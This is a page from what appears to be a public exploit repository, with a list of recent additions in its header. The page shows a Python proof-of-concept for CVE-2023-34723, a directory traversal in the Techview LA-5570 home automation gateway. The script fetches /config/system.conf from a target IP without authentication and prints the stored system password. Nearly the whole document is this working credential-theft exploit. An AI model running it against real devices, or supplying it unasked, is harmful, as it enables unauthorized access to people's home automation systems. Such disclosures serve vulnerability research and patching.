cbe784b087
16 changes to exploits/shellcodes/ghdb Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS Drupal 10.1.2 - web-cache-poisoning-External-service-interaction Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure soosyze 2.0.0 - File Upload SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection Wordpress Plugin Elementor 3.5.5 - Iframe Injection Wp2Fac - OS Command Injection Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) SyncBreeze 15.2.24 - 'login' Denial of Service GOM Player 2.3.90.5360 - Buffer Overflow (PoC) GOM Player 2.3.90.5360 - Remote Code Execution (RCE) Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
77 lines
No EOL
2.7 KiB
Python
Executable file
77 lines
No EOL
2.7 KiB
Python
Executable file
# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
|
|
# Google Dork: N/A
|
|
# Date: 25/08/2023
|
|
# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]
|
|
# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
|
|
# Software Link: N/A
|
|
# Version: 1.0.19_T53
|
|
# Tested on: MACOS/Linux
|
|
# CVE : CVE-2023-34723
|
|
# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725
|
|
|
|
#!/opt/homebrew/bin/python3
|
|
|
|
import requests
|
|
import sys
|
|
from time import sleep
|
|
from urllib3.exceptions import InsecureRequestWarning
|
|
from colorama import init
|
|
from colorama import Fore, Back, Style
|
|
import re
|
|
import os
|
|
import ipaddress
|
|
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
|
|
|
def banner():
|
|
if os.name == 'posix':
|
|
clr_cmd = ('clear')
|
|
elif os.name == 'nt':
|
|
clr_cmd = ('cls')
|
|
os.system(clr_cmd)
|
|
print ("[+]****************************************************[+]")
|
|
print (" | Author : The Security Team |")
|
|
print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")
|
|
print (" | Description : TechVIEW LA-5570 Directory Traversal |")
|
|
print (" | Usage : "+sys.argv[0]+" <target> |")
|
|
print ("[+]****************************************************[+]")
|
|
|
|
def usage():
|
|
print (f"Usage: {sys.argv[0]} <target>")
|
|
|
|
def main(target):
|
|
domain = "http://"+target+"/config/system.conf"
|
|
try:
|
|
url = domain.strip()
|
|
r = requests.get(url, verify=False, timeout=3)
|
|
print ("[+] Retrieving credentials", flush=True, end='')
|
|
sleep(1)
|
|
print(" .", flush=True, end='')
|
|
sleep(1)
|
|
print(" .", flush=True, end='')
|
|
sleep(1)
|
|
print(" .", flush=True, end='')
|
|
if ("system_password" in r.text):
|
|
data = (r.text.split("\n"))
|
|
print (f"\n{data[1]}")
|
|
else:
|
|
print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)
|
|
except TimeoutError:
|
|
print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
|
|
except KeyboardInterrupt:
|
|
return
|
|
except requests.exceptions.Timeout:
|
|
print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
|
|
return
|
|
|
|
if __name__ == '__main__':
|
|
if len(sys.argv)>1:
|
|
banner()
|
|
target = sys.argv[1]
|
|
try:
|
|
validate = ipaddress.ip_address(target)
|
|
if (validate):
|
|
main (target)
|
|
except ValueError as e:
|
|
print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)
|
|
else:
|
|
print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL) |